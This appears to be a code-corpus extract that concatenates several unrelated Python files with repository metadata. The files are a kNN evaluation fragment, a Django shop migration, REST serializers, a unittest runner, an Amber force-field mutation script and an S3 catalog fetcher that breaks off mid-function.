full_data = df.astype(float).values.tolist()
random.shuffle(full_data)
test_size = 0.2
train_set = {2:[], 4:[]}
test_set = {2:[], 4:[]}
train_data = full_data[:-int(test_size* len(full_data))]
test_data = full_data[-int(test_size* len(full_data)):]
#now we want to populate these dictionaries
for i in train_data:
train_set[i[-1]].append(i[:-1])
for i in test_data:
test_set[i[-1]].append(i[:-1])
#now we need to pass the info to kNN
correct = 0
total = 0
for group in test_set:
for data in test_set[group]:
vote, confidence = knn(train_set, data, k=5)
if group == vote:
correct +=1
#else:
#print(confidence)
total +=1
# print('Accuracy:', correct/total)
accuracies.append(correct/total)
print(sum(accuracies)/len(accuracies))
#now we want to compare this to scikit-learn
|
[
"noreply@github.com"
] |
radsn23.noreply@github.com
|
754717027be5b479d0aaf6b94d7fe00fabf44715
|
cee561c3f65aa793b2ce803a3ac775f811a448f8
|
/project/axf/migrations/0001_initial.py
|
30f36a422f80f101b09ec168679fa4b35ec6e7d0
|
[] |
no_license
|
PADDDog/axf
|
a8cb5ad45f8450521b3df63b6c53e88671f76a7b
|
2527dbb7914dbe657bd84f8bfb2a0efe35f99e09
|
refs/heads/master
| 2020-04-24T19:28:45.638178
| 2019-02-25T09:33:48
| 2019-02-25T09:33:48
| 172,213,325
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,081
|
py
|
# Generated by Django 2.1.4 on 2019-02-20 17:01
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Cart',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('userAccount', models.CharField(max_length=20)),
('productid', models.CharField(max_length=10)),
('productnum', models.IntegerField()),
('productprice', models.CharField(max_length=10)),
('isChose', models.BooleanField(default=True)),
('productimg', models.CharField(max_length=150)),
('productname', models.CharField(max_length=100)),
('orderid', models.CharField(default='0', max_length=20)),
('isDelete', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='Consignee',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('userAccount', models.CharField(max_length=20)),
('consigneeName', models.CharField(max_length=20)),
('consigneeTel', models.CharField(max_length=20)),
('consigneeAddr', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Defaultaddr',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('userAccount', models.CharField(max_length=20)),
('defaultaddr', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='FoodTypes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('typeid', models.CharField(max_length=10)),
('typename', models.CharField(max_length=20)),
('typesort', models.IntegerField()),
('childtypenames', models.CharField(max_length=150)),
],
),
migrations.CreateModel(
name='Goods',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('productid', models.CharField(max_length=10)),
('productimg', models.CharField(max_length=150)),
('productname', models.CharField(max_length=50)),
('productlongname', models.CharField(max_length=100)),
('isxf', models.NullBooleanField(default=False)),
('pmdesc', models.CharField(max_length=10)),
('specifics', models.CharField(max_length=20)),
('price', models.FloatField(max_length=10)),
('marketprice', models.CharField(max_length=10)),
('categoryid', models.CharField(max_length=10)),
('childcid', models.CharField(max_length=10)),
('childcidname', models.CharField(max_length=10)),
('dealerid', models.CharField(max_length=10)),
('storenums', models.IntegerField()),
('productnum', models.IntegerField()),
],
),
migrations.CreateModel(
name='MainShow',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('trackid', models.CharField(max_length=10)),
('name', models.CharField(max_length=20)),
('img', models.CharField(max_length=100)),
('categoryid', models.CharField(max_length=10)),
('brandname', models.CharField(max_length=20)),
('img1', models.CharField(max_length=100)),
('childcid1', models.CharField(max_length=10)),
('productid1', models.CharField(max_length=10)),
('longname1', models.CharField(max_length=50)),
('price1', models.CharField(max_length=10)),
('marketprice1', models.CharField(max_length=10)),
('img2', models.CharField(max_length=100)),
('childcid2', models.CharField(max_length=10)),
('productid2', models.CharField(max_length=10)),
('longname2', models.CharField(max_length=50)),
('price2', models.CharField(max_length=10)),
('marketprice2', models.CharField(max_length=10)),
('img3', models.CharField(max_length=100)),
('childcid3', models.CharField(max_length=10)),
('productid3', models.CharField(max_length=10)),
('longname3', models.CharField(max_length=50)),
('price3', models.CharField(max_length=10)),
('marketprice3', models.CharField(max_length=10)),
],
),
migrations.CreateModel(
name='Mustbuy',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('img', models.CharField(max_length=150)),
('name', models.CharField(max_length=20)),
('trackid', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Nav',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('img', models.CharField(max_length=150)),
('name', models.CharField(max_length=20)),
('trackid', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('orderid', models.CharField(max_length=20)),
('userid', models.CharField(max_length=20)),
('progress', models.IntegerField()),
],
),
migrations.CreateModel(
name='Shop',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('img', models.CharField(max_length=150)),
('name', models.CharField(max_length=20)),
('trackid', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('userAccount', models.CharField(max_length=20, unique=True)),
('userPasswd', models.CharField(max_length=20)),
('userName', models.CharField(max_length=20)),
('userPhone', models.CharField(max_length=20)),
('userAdderss', models.CharField(max_length=100)),
('userImg', models.CharField(max_length=150)),
('userRank', models.IntegerField()),
('userToken', models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name='Wheel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('img', models.CharField(max_length=150)),
('name', models.CharField(max_length=20)),
('trackid', models.CharField(max_length=20)),
],
),
]
|
[
"13580217851@163.com"
] |
13580217851@163.com
|
6b355314e228ed79113740c3ce9617049177d3e2
|
985f9c96c687412f44f54aba06c52d8e95505dcd
|
/parkings/serializers.py
|
b78a331d7b1a2768cbc016b3df1f639d2a8198e7
|
[] |
no_license
|
luke92/parkings-api-django
|
a3c485d31d4c3c365fd4ca0b1ba7d06fc22938d8
|
db6039a01de158614d4f91f166e518e0e7cb9b3b
|
refs/heads/master
| 2021-09-27T21:48:40.952424
| 2018-11-11T23:49:16
| 2018-11-11T23:49:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 435
|
py
|
from rest_framework import serializers
from .models.Parkings import Parkings
from .models.Configuration import Configuration
class ParkingsSerializer(serializers.ModelSerializer):
class Meta:
model = Parkings
fields = ("id", "tl_x", "tl_y", "br_x", "br_y", "isOccupied")
class ConfigurationSerializer(serializers.ModelSerializer):
class Meta:
model = Configuration
fields = ("key", "value")
|
[
"cristian.daniel.ortega@gmail.com"
] |
cristian.daniel.ortega@gmail.com
|
faed21171cc2de0cc838c6b5790f70c3e106d0a1
|
db1d7c6d2e2bf04609fbeef739f9ef8de730ae41
|
/python/unit_test/test_all.py
|
f260514d7c4965024c7f6621a4b4fa7acdefc3fe
|
[] |
no_license
|
mhyeagle/programming-language
|
752e42725bf03c0f35c8c84b3d710a58a90ad407
|
8d2d2a8052a8ed8b178ac1d87a23d7fc8ed3803e
|
refs/heads/master
| 2021-01-20T01:50:59.730843
| 2019-12-23T13:21:42
| 2019-12-23T13:21:42
| 83,811,026
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 750
|
py
|
#!/usr/bin/python3
import os
import sys
import unittest
home_dir = os.path.split(os.path.realpath(__file__))[0]
sys.path.append(home_dir + "/unittest")
print("home_dir", home_dir)
print(sys.path)
import class_1_test
import class_2_test
def suite():
    modules_to_test = ('class_1_test',
                       'class_2_test')
    alltests = unittest.TestSuite()
    for module in map(__import__, modules_to_test):
        if hasattr(module, '__list_module__'):
            for submodule in module.__list_module__():
                alltests.addTest(unittest.findTestCases(submodule))
        else:
            alltests.addTest(unittest.findTestCases(module))
    return alltests
if __name__ == '__main__':
unittest.main(defaultTest = 'suite')
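# To run the whole suite from the command line (assuming the test modules
# live under ./unittest next to this script):
#   python3 test_all.py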
|
[
"tianyashuibin@163.com"
] |
tianyashuibin@163.com
|
e6d2dde3fc8bfe1534bc193ea46eac1ebcfe7639
|
47b4d76e9c87e6c45bab38e348ae12a60a60f94c
|
/Mutation_Modules/THR_MNT.py
|
fde9b14924c5c02cbf6e4b6deaea501455c28692
|
[] |
no_license
|
PietroAronica/Parasol.py
|
9bc17fd8e177e432bbc5ce4e7ee2d721341b2707
|
238abcdc2caee7bbfea6cfcdda1ca705766db204
|
refs/heads/master
| 2021-01-10T23:57:40.225140
| 2020-10-14T02:21:15
| 2020-10-14T02:21:15
| 70,791,648
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,736
|
py
|
# THR to MNT Mutation
import Frcmod_creator
import PDBHandler
import Leapy
from parmed.tools.actions import *
from parmed.amber.readparm import *
def parmed_command(vxi='VXI', lipid='No'):
bc = {}
with open('Param_files/AminoAcid/THR.param', 'r') as b:
data = b.readlines()[1:]
for line in data:
key, value = line.split()
bc[key] = float(value)
fc = {}
with open('Param_files/AminoAcid/MNT.param', 'r') as b:
data = b.readlines()[1:]
for line in data:
key, value = line.split()
fc[key] = float(value)
for i in range(11):
a = i*10
parm = AmberParm('Solv_{}_{}.prmtop'.format(a, 100-a))
changeLJPair(parm, ':{}@H'.format(vxi), ':{}@HH31'.format(vxi), '0', '0').execute()
change(parm, 'charge', ':{}@N'.format(vxi), bc['N']+((fc['N']-bc['N'])/10)*i).execute()
change(parm, 'charge', ':{}@H'.format(vxi), bc['H']-(bc['H']/10)*i).execute()
change(parm, 'charge', ':{}@CH3'.format(vxi), (fc['CH3']/10)*i).execute()
change(parm, 'charge', ':{}@HH31'.format(vxi), (fc['HH31']/10)*i).execute()
change(parm, 'charge', ':{}@HH32'.format(vxi), (fc['HH32']/10)*i).execute()
change(parm, 'charge', ':{}@HH33'.format(vxi), (fc['HH33']/10)*i).execute()
change(parm, 'charge', ':{}@CA'.format(vxi), bc['CA']+((fc['CA']-bc['CA'])/10)*i).execute()
change(parm, 'charge', ':{}@HA'.format(vxi), bc['HA']+((fc['HA']-bc['HA'])/10)*i).execute()
change(parm, 'charge', ':{}@CB'.format(vxi), bc['CB']+((fc['CB']-bc['CB'])/10)*i).execute()
change(parm, 'charge', ':{}@HB'.format(vxi), bc['HB']+((fc['HB']-bc['HB'])/10)*i).execute()
change(parm, 'charge', ':{}@CG2'.format(vxi), bc['CG2']+((fc['CG2']-bc['CG2'])/10)*i).execute()
change(parm, 'charge', ':{}@HG21'.format(vxi), bc['HG21']+((fc['HG21']-bc['HG21'])/10)*i).execute()
change(parm, 'charge', ':{}@HG22'.format(vxi), bc['HG22']+((fc['HG22']-bc['HG22'])/10)*i).execute()
change(parm, 'charge', ':{}@HG23'.format(vxi), bc['HG23']+((fc['HG23']-bc['HG23'])/10)*i).execute()
change(parm, 'charge', ':{}@OG1'.format(vxi), bc['OG1']+((fc['OG1']-bc['OG1'])/10)*i).execute()
change(parm, 'charge', ':{}@HG1'.format(vxi), bc['HG1']+((fc['HG1']-bc['HG1'])/10)*i).execute()
change(parm, 'charge', ':{}@C'.format(vxi), bc['C']+((fc['C']-bc['C'])/10)*i).execute()
change(parm, 'charge', ':{}@O'.format(vxi), bc['O']+((fc['O']-bc['O'])/10)*i).execute()
setOverwrite(parm).execute()
parmout(parm, 'Solv_{}_{}.prmtop'.format(a, 100-a)).execute()
def makevxi(struct, out, aa, vxi='VXI'):
struct.residue_dict[aa].set_resname(vxi)
N = struct.residue_dict[aa].atom_dict['N']
H = struct.residue_dict[aa].atom_dict['H']
pdb = open(out, 'w')
try:
pdb.write(struct.other_dict['Cryst1'].formatted())
except KeyError:
pass
for res in struct.residue_list:
for atom in res.atom_list:
if atom.get_name() == 'H' and res.get_resname() == vxi:
pdb.write(atom.formatted())
pdb.write(atom.halfway_between('CH3', N, H))
pdb.write(atom.superimposed1('HH31', H))
pdb.write(atom.superimposed2('HH32', H))
pdb.write(atom.superimposed3('HH33', H))
else:
pdb.write(atom.formatted())
try:
pdb.write(struct.other_dict[atom.get_number()].ter())
except:
pass
for oth in struct.other_dict:
try:
if oth.startswith('Conect'):
pdb.write(struct.other_dict[oth].formatted())
except:
pass
pdb.write('END\n')
def variablemake(sym='^'):
    # generate the eight placeholder atom-type names ^1..^8
    return tuple(sym + str(i) for i in range(1, 9))
def lib_make(ff, outputfile, vxi='VXI', var=variablemake()):
metcar = var[0]
methyd = var[1]
hydhyd = var[2]
ctrl = open('lyp.in', 'w')
ctrl.write("source %s\n"%ff)
ctrl.write("%s=loadpdb Param_files/LibPDB/THR-MNT.pdb\n"%vxi)
ctrl.write('set %s.1.1 element "N"\n'%vxi)
ctrl.write('set %s.1.2 element "H"\n'%vxi)
ctrl.write('set %s.1.3 element "C"\n'%vxi)
ctrl.write('set %s.1.4 element "H"\n'%vxi)
ctrl.write('set %s.1.5 element "H"\n'%vxi)
ctrl.write('set %s.1.6 element "H"\n'%vxi)
ctrl.write('set %s.1.7 element "C"\n'%vxi)
ctrl.write('set %s.1.8 element "H"\n'%vxi)
ctrl.write('set %s.1.9 element "C"\n'%vxi)
ctrl.write('set %s.1.10 element "H"\n'%vxi)
ctrl.write('set %s.1.11 element "C"\n'%vxi)
ctrl.write('set %s.1.12 element "H"\n'%vxi)
ctrl.write('set %s.1.13 element "H"\n'%vxi)
ctrl.write('set %s.1.14 element "H"\n'%vxi)
ctrl.write('set %s.1.15 element "O"\n'%vxi)
ctrl.write('set %s.1.16 element "H"\n'%vxi)
ctrl.write('set %s.1.17 element "C"\n'%vxi)
ctrl.write('set %s.1.18 element "O"\n'%vxi)
ctrl.write('set %s.1.1 name "N"\n'%vxi)
ctrl.write('set %s.1.2 name "H"\n'%vxi)
ctrl.write('set %s.1.3 name "CH3"\n'%vxi)
ctrl.write('set %s.1.4 name "HH31"\n'%vxi)
ctrl.write('set %s.1.5 name "HH32"\n'%vxi)
ctrl.write('set %s.1.6 name "HH33"\n'%vxi)
ctrl.write('set %s.1.7 name "CA"\n'%vxi)
ctrl.write('set %s.1.8 name "HA"\n'%vxi)
ctrl.write('set %s.1.9 name "CB"\n'%vxi)
ctrl.write('set %s.1.10 name "HB"\n'%vxi)
ctrl.write('set %s.1.11 name "CG2"\n'%vxi)
ctrl.write('set %s.1.12 name "HG21"\n'%vxi)
ctrl.write('set %s.1.13 name "HG22"\n'%vxi)
ctrl.write('set %s.1.14 name "HG23"\n'%vxi)
ctrl.write('set %s.1.15 name "OG1"\n'%vxi)
ctrl.write('set %s.1.16 name "HG1"\n'%vxi)
ctrl.write('set %s.1.17 name "C"\n'%vxi)
ctrl.write('set %s.1.18 name "O"\n'%vxi)
ctrl.write('set %s.1.1 type "N"\n'%vxi)
ctrl.write('set %s.1.2 type "%s"\n'%(vxi, hydhyd))
ctrl.write('set %s.1.3 type "%s"\n'%(vxi, metcar))
ctrl.write('set %s.1.4 type "%s"\n'%(vxi, methyd))
ctrl.write('set %s.1.5 type "%s"\n'%(vxi, methyd))
ctrl.write('set %s.1.6 type "%s"\n'%(vxi, methyd))
ctrl.write('set %s.1.7 type "CT"\n'%vxi)
ctrl.write('set %s.1.8 type "H1"\n'%vxi)
ctrl.write('set %s.1.9 type "CT"\n'%vxi)
ctrl.write('set %s.1.10 type "H1"\n'%vxi)
ctrl.write('set %s.1.11 type "CT"\n'%vxi)
ctrl.write('set %s.1.12 type "HC"\n'%vxi)
ctrl.write('set %s.1.13 type "HC"\n'%vxi)
ctrl.write('set %s.1.14 type "HC"\n'%vxi)
ctrl.write('set %s.1.15 type "OH"\n'%vxi)
ctrl.write('set %s.1.16 type "HO"\n'%vxi)
ctrl.write('set %s.1.17 type "C"\n'%vxi)
ctrl.write('set %s.1.18 type "O"\n'%vxi)
ctrl.write('bond %s.1.1 %s.1.2\n'%(vxi, vxi))
ctrl.write('bond %s.1.1 %s.1.3\n'%(vxi, vxi))
ctrl.write('bond %s.1.1 %s.1.7\n'%(vxi, vxi))
ctrl.write('bond %s.1.3 %s.1.4\n'%(vxi, vxi))
ctrl.write('bond %s.1.3 %s.1.5\n'%(vxi, vxi))
ctrl.write('bond %s.1.3 %s.1.6\n'%(vxi, vxi))
ctrl.write('bond %s.1.7 %s.1.8\n'%(vxi, vxi))
ctrl.write('bond %s.1.7 %s.1.9\n'%(vxi, vxi))
ctrl.write('bond %s.1.7 %s.1.17\n'%(vxi, vxi))
ctrl.write('bond %s.1.9 %s.1.10\n'%(vxi, vxi))
ctrl.write('bond %s.1.9 %s.1.11\n'%(vxi, vxi))
ctrl.write('bond %s.1.9 %s.1.15\n'%(vxi, vxi))
ctrl.write('bond %s.1.11 %s.1.12\n'%(vxi, vxi))
ctrl.write('bond %s.1.11 %s.1.13\n'%(vxi, vxi))
ctrl.write('bond %s.1.11 %s.1.14\n'%(vxi, vxi))
ctrl.write('bond %s.1.15 %s.1.16\n'%(vxi, vxi))
ctrl.write('bond %s.1.17 %s.1.18\n'%(vxi, vxi))
ctrl.write('set %s.1 connect0 %s.1.N\n'%(vxi, vxi))
ctrl.write('set %s.1 connect1 %s.1.C\n'%(vxi, vxi))
ctrl.write('set %s name "%s"\n'%(vxi, vxi))
ctrl.write('set %s.1 name "%s"\n'%(vxi, vxi))
ctrl.write('set %s head %s.1.N\n'%(vxi, vxi))
ctrl.write('set %s tail %s.1.C\n'%(vxi, vxi))
ctrl.write('saveoff %s %s.lib\n'%(vxi, vxi))
ctrl.write("quit\n")
ctrl.close()
Leapy.run('lyp.in', outputfile)
def all_make():
for i in range(0,110,10):
Frcmod_creator.make ('{}_{}.frcmod'.format(i, 100-i))
def cal(x, y, i):
num = x+((y-x)/10)*i
return num
def lac(x, y, i):
num = y+((x-y)/10)*i
return num
def stock_add_to_all(var=variablemake()):
metcar = var[0]
methyd = var[1]
hydhyd = var[2]
Frcmod_creator.make_hyb()
Frcmod_creator.TYPE_insert(metcar, 'C', 'sp3')
Frcmod_creator.TYPE_insert(methyd, 'H', 'sp3')
Frcmod_creator.TYPE_insert(hydhyd, 'H', 'sp3')
p = {}
with open('Param_files/Stock/Stock.param', 'r') as b:
data = b.readlines()[1:]
for line in data:
p[line.split()[0]] = []
for point in line.split()[1:]:
p[line.split()[0]].append(float(point))
for i in range(11):
a = i*10
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), metcar, lac(p['CT'][0], p['0_C'][0], i), lac(p['CT'][1], p['0_C'][1], i))
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), methyd, lac(p['H1'][0], p['0_H'][0], i), lac(p['H1'][1], p['0_H'][1], i))
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), hydhyd, lac(p['0_H'][0], p['H'][0], i), lac(p['0_H'][1], p['H'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('N', metcar), lac(p['CT_N2'][0], p['CT_mN'][0], i), lac(p['CT_N2'][1], p['CT_mN'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('N', hydhyd), lac(p['HC_sCN'][0], p['NA_H'][0], i), lac(p['HC_sCN'][1], p['NA_H'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format(metcar, methyd), lac(p['CT_HC'][0], p['HC_mCTN'][0], i), lac(p['CT_HC'][1], p['HC_mCTN'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('N', metcar, methyd), lac(p['C_C_H'][0], p['Dritt'][0], i), lac(p['C_C_H'][1], p['Dritt'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(methyd, metcar, methyd), lac(p['H_C_H'][0], p['Close'][0], i), lac(p['H_C_H'][1], p['Close'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('C', 'N', metcar), lac(p['C_N_CT'][0], p['C_C_H'][0], i), lac(p['C_N_CT'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('C', 'N', hydhyd), lac(p['C_N_CT'][0], p['C_C_H'][0], i), lac(p['C_N_CT'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'N', metcar), lac(p['CT_N_CT'][0], p['C_C_H'][0], i), lac(p['CT_N_CT'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'N', hydhyd), lac(p['CT_N_CT'][0], p['C_C_H'][0], i), lac(p['CT_N_CT'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(hydhyd, 'N ', metcar), lac(p['Close'][0], p['Close'][0], i), lac(p['Close'][1], p['Close'][1], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('C ', 'N ', metcar, methyd), lac(p['X_CT_N_X'][0], p['X_CT_N_X'][0], i), lac(p['X_CT_N_X'][1], p['X_CT_N_X'][1], i), lac(p['X_CT_N_X'][2], p['X_CT_N_X'][2], i), lac(p['X_CT_N_X'][3], p['X_CT_N_X'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', 'N ', metcar, methyd), lac(p['X_CT_N_X'][0], p['X_CT_N_X'][0], i), lac(p['X_CT_N_X'][1], p['X_CT_N_X'][1], i), lac(p['X_CT_N_X'][2], p['X_CT_N_X'][2], i), lac(p['X_CT_N_X'][3], p['X_CT_N_X'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(hydhyd, 'N ', metcar, methyd), lac(p['0_Dihe'][0], p['0_Dihe'][0], i), lac(p['0_Dihe'][1], p['0_Dihe'][1], i), lac(p['0_Dihe'][2], p['0_Dihe'][2], i), lac(p['0_Dihe'][3], p['0_Dihe'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), metcar, lac(p['CT'][2], p['0_C'][2], i), lac(p['CT'][3], p['0_C'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), methyd, lac(p['HC'][2], p['0_H'][2], i), lac(p['HC'][3], p['0_H'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), hydhyd, lac(p['0_H'][2], p['HP'][2], i), lac(p['0_H'][3], p['HP'][3], i))
|
[
"pietro.ga.aronica@gmail.com"
] |
pietro.ga.aronica@gmail.com
|
5a3dde463182d1a912e6f240e481d7a62cb4f6b6
|
455d651b7362100718c0e516f37b85fea4b2c38e
|
/parser/digitalsmith_fetcher_modified.py
|
dd774c9b5076cfe24bcff19e562175e316e732f9
|
[] |
no_license
|
jsahuroot/catalogue
|
a5215c985857ea390e521d5be6e997fe1a30b66e
|
7638e9ef2f88900877085b3e1b04908a7db8a2be
|
refs/heads/master
| 2023-03-02T21:11:12.020454
| 2021-02-03T09:13:02
| 2021-02-03T09:13:02
| 323,800,025
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,271
|
py
|
#!/usr/bin/env python
import os
import json
import jsonschema
import time
import sys
from vtv_utils import make_dir_list, remove_dir_files, copy_file_list, copy_file, move_file_forcefully, vtv_send_html_mail_2
from vtv_task import VtvTask, vtv_task_main
from s3_utils import download_s3_file, get_s3_file_by_wildcard
class DigitalSmithFetchException(Exception):
def __init__(self, msg):
self.msg = msg
class DigitalSmithFetcher(VtvTask):
''' The fetcher '''
def __init__(self):
''' '''
VtvTask.__init__(self)
self.config = self.load_config()
process_dir = self.config["process_dir"]
self.PROCESS_DIR = os.path.join(self.system_dirs.VTV_DATAGEN_DIR, process_dir)
self.DATA_DIR = os.path.join(self.PROCESS_DIR, self.config["data_dir"])
self.REPORTS_DIR = os.path.join(self.system_dirs.VTV_REPORTS_DIR, process_dir)
if os.path.exists(self.DATA_DIR):
remove_dir_files(self.DATA_DIR, self.logger)
create_list = [self.PROCESS_DIR, self.DATA_DIR, self.REPORTS_DIR]
make_dir_list(create_list, self.logger)
self.options.report_file_name = os.path.join(self.REPORTS_DIR, '%s.html' % self.name_prefix)
self.tgzs_to_keep = 1
self.tar_file_prefix = self.config['tar_file_prefix']
self.s3path = ''
self.available_ids_path = ''
self.tar_files = []
self.file_name = self.config["input_catalog"]
self.available_ids_file = self.config["available_ids"]
aux_info = {
"PATH": "s3://ds-veveo-voice/vodafone/pt-staging/datagen/nlu_catalogs/catalog-*.gz",
"AVAILABLE_IDS_PATH": "s3://ds-veveo-voice/vodafone/pt-staging/datagen/nlu_catalogs/available_ids-*.data",
"APPLICATIONS_PATH": "s3://vodafone-voice-digitalsmiths.net/stage/pt-PT/datagen/navigation_data/navigation_targets_*",
"SETTINGS_PATH": "s3://vodafone-voice-digitalsmiths.net/stage/pt-PT/datagen/settings_data/settings_*"
}
'''
aux_info = {
"PATH": "s3://vodafone-voice-digitalsmiths.net/stage/de-DE/datagen/catalogs/catalog-*.gz",
"APPLICATIONS_PATH": "s3://vodafone-voice-digitalsmiths.net/stage/de-DE/datagen/navigation_data/navigation_targets_*",
"SETTINGS_PATH": "s3://vodafone-voice-digitalsmiths.net/stage/de-DE/datagen/settings_data/settings_*"
}
aux_info = {
"PATH": "s3://ds-veveo-voice/vodafone/de-staging/datagen/nlu_catalogs/catalog-*.gz",
"AVAILABLE_IDS_PATH": "s3://ds-veveo-voice/vodafone/de-staging/datagen/nlu_catalogs/available_ids-*.data",
"APPLICATIONS_PATH": "s3://vodafone-voice-digitalsmiths.net/stage/de-DE/datagen/navigation_data/navigation_targets_*",
"SETTINGS_PATH": "s3://vodafone-voice-digitalsmiths.net/stage/de-DE/datagen/settings_data/settings_*"
}
aux_info = {
"PATH": "s3://ds-veveo-voice/vodafone/de-staging/datagen/nlu_catalogs/catalog-*.gz",
"AVAILABLE_IDS_PATH": "s3://ds-veveo-voice/vodafone/de-staging/datagen/nlu_catalogs/available_ids-*.data",
"APPLICATIONS_PATH": "s3://ds-veveo-voice/vodafone/de-staging/datagen/navigation_targets_*",
"SETTINGS_PATH": "s3://ds-veveo-voice/vodafone/de-staging/datagen/settings_*"
}
'''
#if 'AUX_INFO' in os.environ:
if aux_info is not None:
#aux_info = eval(os.environ['AUX_INFO'])
self.s3path = aux_info.get('PATH', '')
self.available_ids_path = aux_info.get('AVAILABLE_IDS_PATH', '')
self.channel_s3path = aux_info.get('CHANNELS_PATH', '')
if self.channel_s3path != '':
self.channel_file_name = self.config["input_channel_file"]
self.is_validate = self.config["VALIDATION_FLAG"]
if self.is_validate:
self.email_recipiants = self.config["EMAIL_LIST"]
self.sending_mail_retries = self.config["MAIL_RETRIES"]
self.sender = self.config["SENDER"]
self.server = self.config["SERVER"]
self.channel_schema_file = self.config["CHANNEL_SCHEMA_FILE"]
def load_config(self):
''' Load config '''
config = {}
with open(self.options.config_file) as json_file:
config = json.load(json_file)
return config
def download_data(self):
status, filenames = get_s3_file_by_wildcard(self.s3path, self.logger)
if filenames:
if status:
self.logger.error("Failed to find files in %s" %self.s3path)
raise DigitalSmithFetchException("Failed to find files in %s" %self.s3path)
filenames.sort()
file_name = filenames[-1]
status, path = download_s3_file(file_name, self.PROCESS_DIR, self.logger)
if status:
self.logger.error("Failed to download file %s" %file_name)
raise DigitalSmithFetchException("Failed to download file %s" %file_name)
new_path = path.replace(os.path.basename(path),self.file_name)
self.logger.info("Decompressing %s into %s", path, new_path)
cmd = 'gzip -dv --stdout {gz_file} > {outfile}'
self.start_process(
"decompress_%s" % path,
cmd.format(gz_file=path, outfile=new_path)
)
copy_file_list([new_path], self.DATA_DIR, self.logger)
self.tar_files.append(os.path.basename(new_path))
else:
raise DigitalSmithFetchException("No files in %s" %self.s3path)
def download_available_id_data(self):
status, filenames = get_s3_file_by_wildcard(self.available_ids_path, self.logger)
if filenames:
if status:
self.logger.error("Failed to find files in %s" %self.available_ids_path)
raise DigitalSmithFetchException("Failed to find files in %s" %self.available_ids_path)
filenames.sort()
file_name = filenames[-1]
status, path = download_s3_file(file_name, self.PROCESS_DIR, self.logger)
if status:
self.logger.error("Failed to download file %s" %file_name)
raise DigitalSmithFetchException("Failed to download file %s" %file_name)
new_path = os.path.join(self.PROCESS_DIR, self.available_ids_file)
os.rename(path, new_path)
copy_file_list([new_path], self.DATA_DIR, self.logger)
else:
raise DigitalSmithFetchException("No files in %s" %self.available_ids_path)
def download_channels_data(self):
status, filenames = get_s3_file_by_wildcard(self.channel_s3path, self.logger)
if filenames:
if status:
self.logger.error("Failed to find files in %s" %self.channel_s3path)
raise DigitalSmithFetchException("Failed to find files in %s" %self.channel_s3path)
filenames.sort()
file_name = filenames[-1]
status, path = download_s3_file(file_name, self.PROCESS_DIR, self.logger)
if status:
self.logger.error("Failed to download file %s" %file_name)
raise DigitalSmithFetchException("Failed to download file %s" %file_name)
new_path = path.replace(os.path.basename(path),self.channel_file_name)
